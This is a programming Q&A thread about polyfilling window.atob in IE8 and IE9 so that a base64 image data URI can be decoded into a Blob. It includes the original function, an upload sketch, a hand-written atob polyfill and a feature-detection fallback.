base64 image decoding: window.atob() is undefined in IE9 and below, how to fix? (IE9 / IE8)

```
function base64Img2Blob(code) {
    // code is a data URI, e.g. "data:image/png;base64,...."
    var parts = code.split(';base64,');
    var contentType = parts[0].split(':')[1]; // e.g. "image/png"
    var raw = window.atob(parts[1]);          // atob is undefined in IE9 and below
    var rawLength = raw.length;

    var uInt8Array = new Uint8Array(rawLength);

    for (var i = 0; i < rawLength; ++i) {
        uInt8Array[i] = raw.charCodeAt(i);
    }

    return new Blob([uInt8Array], { type: contentType });
}
```
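For context, the usual reason to convert the data URI into a Blob is to send the image as binary rather than as a base64 string. A minimal usage sketch, assuming a `canvas` variable and a hypothetical `/upload` endpoint (note that FormData and the Blob constructor themselves only exist in IE10+):

```
// Hypothetical upload of the decoded image (requires XHR2/FormData, i.e. IE10+)
var blob = base64Img2Blob(canvas.toDataURL('image/png'));
var form = new FormData();
form.append('file', blob);

var xhr = new XMLHttpRequest();
xhr.open('POST', '/upload'); // hypothetical endpoint
xhr.send(form);
```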

3 answers

There is far too much that IE8's JavaScript doesn't support. If all you need is to decode base64 and display an image, you'd be better off doing it with a Flex/Flash plugin.

Write your own atob implementation in JS; there seem to be ready-made ones on the web, have a look around.
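For reference, a minimal sketch of such a hand-rolled atob: it decodes standard base64 into a binary string and skips characters outside the alphabet, but does no real validation of malformed input:

```
// Minimal window.atob polyfill sketch for IE8/9
if (!window.atob) {
    window.atob = function (input) {
        var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
        var str = String(input).replace(/=+$/, ''); // drop trailing '=' padding
        var output = '';
        for (var bc = 0, bs = 0, buffer, idx = 0; (buffer = str.charAt(idx++)); ) {
            buffer = chars.indexOf(buffer);          // 6-bit value of this character
            if (buffer === -1) continue;             // ignore anything outside the alphabet
            bs = bc % 4 ? bs * 64 + buffer : buffer; // accumulate 6 bits per character
            if (bc++ % 4) {                          // chars 2-4 of each group emit one byte
                output += String.fromCharCode(255 & (bs >> (-2 * bc & 6)));
            }
        }
        return output;
    };
}
```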

Pull in the compatibility library jQuery.base64.js:

```
if (!window.btoa) window.btoa = $.base64.btoa;
if (!window.atob) window.atob = $.base64.atob;
```

That said, I suspect the Uint8Array and Blob used in your code aren't supported in those browsers either.
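That caveat matters: Uint8Array and the Blob constructor only appear in IE10, so even with an atob polyfill the function above cannot produce a Blob in IE8/9. A feature-detection sketch that falls back to using the data URI directly as the image source (the `preview` element id is hypothetical; IE8 caps image data URIs at 32KB, IE9 does not):

```
// Sketch: use the Blob path only where it is actually supported (IE10+),
// otherwise assign the data URI straight to the <img>.
function showBase64Image(dataURI) {
    var img = document.getElementById('preview'); // hypothetical <img> element
    if (window.atob && window.Uint8Array && window.Blob && (window.URL || window.webkitURL)) {
        var blob = base64Img2Blob(dataURI);
        img.src = (window.URL || window.webkitURL).createObjectURL(blob);
    } else {
        img.src = dataURI; // IE8 limits image data URIs to 32KB; IE9 has no such limit
    }
}
```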
